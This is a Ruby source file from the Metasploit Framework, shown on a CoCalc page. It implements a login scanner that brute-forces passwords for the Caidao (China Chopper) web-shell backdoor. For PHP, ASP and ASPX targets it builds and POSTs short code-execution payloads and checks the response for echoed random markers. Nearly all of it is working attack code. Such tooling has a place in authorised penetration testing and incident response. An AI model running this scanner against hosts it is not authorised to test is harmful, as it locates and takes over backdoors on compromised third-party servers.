CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
require 'metasploit/framework/login_scanner/http'
2

3
module Metasploit
4
  module Framework
5
    module LoginScanner
6

7
      # Chinese Caidao login scanner
8
      class Caidao < HTTP
9
        # Inherit LIKELY_PORTS, LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
10
        DEFAULT_PORT       = 80
11
        PRIVATE_TYPES      = [ :password ]
12
        LOGIN_STATUS       = Metasploit::Model::Login::Status # Shorter name
13

14
        # Checks if the target is Caidao Backdoor. The login module should call this.
15
        #
16
        # @return [Boolean] TrueClass if target is Caidao, otherwise FalseClass
17
        def check_setup
18
          @flag ||= Rex::Text.rand_text_alphanumeric(4)
19
          @lmark ||= Rex::Text.rand_text_alphanumeric(4)
20
          @rmark ||= Rex::Text.rand_text_alphanumeric(4)
21

22
          case uri
23
          when /php$/mi
24
            @payload = "$_=\"#{@flag}\";echo \"#{@lmark}\".$_.\"#{@rmark}\";"
25
            return true
26
          when /asp$/mi
27
            @payload = 'execute("response.write(""'
28
            @payload << "#{@lmark}"
29
            @payload << '""):response.write(""'
30
            @payload << "#{@flag}"
31
            @payload << '""):response.write(""'
32
            @payload << "#{@rmark}"
33
            @payload << '""):response.end")'
34
            return true
35
          when /aspx$/mi
36
            @payload = "Response.Write(\"#{@lmark}\");"
37
            @payload << "Response.Write(\"#{@flag}\");"
38
            @payload << "Response.Write(\"#{@rmark}\")"
39
            return true
40
          end
41
          false
42
        end
43

44
        def set_sane_defaults
45
          self.method = "POST" if self.method.nil?
46
          super
47
        end
48

49
        # Actually doing the login. Called by #attempt_login
50
        #
51
        # @param username [String] The username to try
52
        # @param password [String] The password to try
53
        # @return [Hash]
54
        #   * :status [Metasploit::Model::Login::Status]
55
        #   * :proof [String] the HTTP response body
56
        def try_login(username, password)
57
          res = send_request(
58
            'method'  => method,
59
            'uri'     => uri,
60
            'data'    => "#{password}=#{@payload}"
61
          )
62

63
          unless res
64
            return { :status => LOGIN_STATUS::UNABLE_TO_CONNECT, :proof => res.to_s }
65
          end
66

67
          if res && res.code == 200 && res.body.to_s.include?("#{@lmark}#{@flag}#{@rmark}")
68
            return { :status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s }
69
          end
70

71
          { :status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s }
72
        end
73

74
        # Attempts to login to Caidao Backdoor. This is called first.
75
        #
76
        # @param credential [Metasploit::Framework::Credential] The credential object
77
        # @return [Result] A Result object indicating success or failure
78
        def attempt_login(credential)
79
          result_opts = {
80
            credential:  credential,
81
            status: Metasploit::Model::Login::Status::INCORRECT,
82
            proof: nil,
83
            host: host,
84
            port: port,
85
            protocol: 'tcp'
86
          }
87

88
          if ssl
89
            result_opts[:service_name] = 'https'
90
          else
91
            result_opts[:service_name] = 'http'
92
          end
93

94
          begin
95
            result_opts.merge!(try_login(credential.public, credential.private))
96
          rescue ::Rex::ConnectionError => e
97
            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
98
          end
99
          Result.new(result_opts)
100
        end
101
      end
102
    end
103
  end
104
end
105

106